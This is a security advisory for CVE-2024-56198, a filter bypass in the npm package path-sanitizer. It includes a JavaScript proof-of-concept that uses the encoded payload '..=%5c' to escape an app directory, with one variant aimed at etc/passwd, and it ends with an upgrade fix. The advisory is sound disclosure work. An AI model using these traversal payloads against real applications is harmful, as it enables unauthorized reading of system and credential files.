CVE-2024-56198
path-sanitizer allows bypassing the existing filters to achieve path-traversal vulnerability
Description
### Summary This is a POC for a path-sanitizer [npm package](https://www.npmjs.com/package/path-sanitizer). The filters can be bypassed and can result in path traversal. Payload: `..=%5c` can be used to bypass this on CLI (along with other candidates). Something similar would likely work on web apps as well. ### PoC Here's the code to test for the filter bypass: ```js const sanitize = require("path-sanitizer") const path = require("path") const fs = require("fs") // Real scenario: function routeHandler(myPath) { // Lets just assume that the path was extracted from the request // We want to read a file in the C:\Users\user\Desktop\myApp\ directory // But the user should be able to access C:\Users\user\Desktop\ // So we need to sanitize the path const APP_DIR = "/var/hacker" const sanitized = path.join(APP_DIR, sanitize(myPath)) // Now we would usally read the file // But in this case we just gonna print the path // console.log(sanitized) return sanitized } function readFile(filePath) { const absolutePath = path.resolve(filePath) // Resolve to absolute path fs.readFile(absolutePath, "utf8", (err, data) => { if (err) { console.error(`Error reading the file: ${err.message}`) return } console.log(`Contents of the file ${filePath} :\n${data}`) }) } input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5ctmp/hacked.txt" // input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5cetc/passwd" input_user_payload = "../../../../../../../../tmp/hacked.txt" readFile(routeHandler(input_user_bypass)) readFile(routeHandler(input_user_payload)) ``` Here is a video POC: (this is a Loom POC, only users with the UUID of the video can see it) https://www.loom.com/share/b766ece5193842848ce7562fcd559256?sid=fd826eb6-0eee-4601-bf0e-9cfee5c56e9d ### Impact Any CLI tool or library using this package can be/will be vulnerable to Path traversal.
How to fix CVE-2024-56198
To remediate CVE-2024-56198, upgrade the affected package to a fixed version below.
- —upgrade to 3.1.0 or later
Is CVE-2024-56198 being exploited?
Low — EPSS is 0.8%, meaning exploitation activity has not been observed at scale.